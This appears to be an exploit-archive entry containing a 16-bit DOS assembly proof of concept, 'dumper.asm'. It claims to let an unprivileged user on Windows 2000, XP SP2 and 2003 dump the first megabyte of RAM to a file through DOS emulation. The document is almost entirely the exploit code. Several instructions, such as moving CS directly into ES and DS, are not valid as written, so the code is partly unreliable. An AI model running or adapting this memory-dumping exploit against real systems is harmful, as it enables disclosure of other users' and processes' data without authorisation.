windowsMem.txt

`Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no  
particular privilege).  
  
Tested under : Win 2000, XP SP2, 2003  
  
Code :  
  
;---------------- [ dumper.asm ]-----------------------------------------  
; Dump first 1 Mo of memory under any MS product  
; 1 Mo is the maximum quantity of accessible memory  
; in real mode using 16b OSes.  
;  
; endrazine, last update : 30/12/2005  
;  
;-------------------------------------------------------------------------  
  
code segment  
org 100h  
assume ds:code, es:code, cs:code  
  
  
xor ax,ax  
mov si,ax  
  
start:  
mov ah, 09h  
mov dx,offset welcome  
int 21h  
  
xor ax,ax ;Wait until key pressed  
int 16h  
  
  
mov ah, 3ch ; MS DOS Create file Function  
mov dx, offset fname  
xor cx,cx  
int 21h  
  
  
mov ax, 3d01h ; MS DOS Open file Function  
int 21h  
mov handle,ax  
  
  
xor ax,ax  
mov ds,ax  
mov myds,ds  
mov cx,32  
  
dabigloop:  
push cx  
  
xor ax,ax  
mov si,ax  
  
;==destination==  
mov di,offset buffer  
mov es,cs  
  
;==compteur==  
mov cx,16384  
  
;==copy==  
rep movsw  
  
mov ds,cs  
  
xor ax,ax  
mov ah, 40h  
mov bx,handle  
mov cx,32768; +10  
mov dx, offset buffer  
int 21h  
  
mov ax,myds  
;add ax,2047 ;repeat last 16b  
add ax,2048  
mov myds,ax  
mov ds,ax  
  
pop cx  
  
loop dabigloop  
  
mov ax,4ch ; Quit  
int 21h  
  
  
myds dw ?  
handle dw ?  
welcome db '[ Raw Dos Memory Dumper ]',10,13  
db '',10,13  
db '[ coded by endrazine ]',10,13  
db '',10,13  
db '[ Dumping First Memory chunk to Dump.txt ]',10,13  
db 'Press any key$',10,13  
fname db 'Dump.txt',0  
buffer db 32768 dup ?  
some_canari_separator db '//////////',0  
end start  
  
end  
  
  
;------------------------------------------------------------------------  
  
  
  
Endrazine-  
  
`